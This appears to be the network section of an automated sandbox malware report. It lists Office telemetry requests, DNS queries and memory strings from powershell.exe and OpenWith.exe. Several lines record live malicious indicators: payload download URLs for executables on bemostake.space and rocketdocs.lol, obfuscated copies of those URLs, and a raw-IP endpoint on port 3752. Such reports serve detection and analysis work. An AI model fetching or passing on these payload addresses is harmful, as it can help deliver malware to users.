                        Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                        Source: global trafficDNS traffic detected: DNS query: bemostake.space
                        Source: global trafficDNS traffic detected: DNS query: rocketdocs.lol
                        Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bemostake.space
                        Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0FBB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rocketdocs.lol
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.1550976753.0000018C260CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                        Source: OpenWith.exe, 0000000B.00000003.1758526956.000001BD8757E000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1808084063.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1635724874.000001BD8757B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758398905.000001BD87572000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1789392969.000001BD87593000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1758526956.000001BD8758D000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000B.00000003.1594021561.000001BD8757A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0E041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1441747026.000001D898171000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F72C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bemostake.space
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exeHtj
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F672000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bp24mostakp24.spacp24/tp24st/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.p24xp24Ht
                        Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                        Source: OpenWith.exe, 0000000B.00000003.1635591198.000001BD877F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discordapp.com
                        Source: powershell.exe, 00000004.00000002.1441747026.000001D89839A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0EC72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: powershell.exe, 00000001.00000002.1541187527.0000018C1E0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1541187527.0000018C1E1F2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1477363753.000001D8A81DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rocketdocs.lol
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rocketdocs.lol/utox_x86.exe
                        Source: powershell.exe, 00000001.00000002.1462792465.0000018C0F76A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rockp24tdocs.lol/utox_x86.p24xp24
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55063 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52232 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55193
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55194
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54654 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53569 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54459 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52919
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54975 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52220 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52186 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54287 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56388 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55704 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52920
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56182 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56051
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53363 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54012 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56294
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55979 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56053
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56295
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54848 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55831 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52815 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56125 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52920 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52174 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52209 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53856 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52945
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 53752 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52947
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52919 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54482 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52152 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                        Source: unknownNetwork traffic detected: HTTP traffic on port 54997 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56070
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56071
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56479
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56238
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54063
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52207 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55397
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52176 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52451 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55398
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56480
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56240
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54064
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 52188 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55775 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                        Source: unknownNetwork traffic detected: HTTP traffic on port 56332 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55041 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55159
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55280 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 55602 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 56497
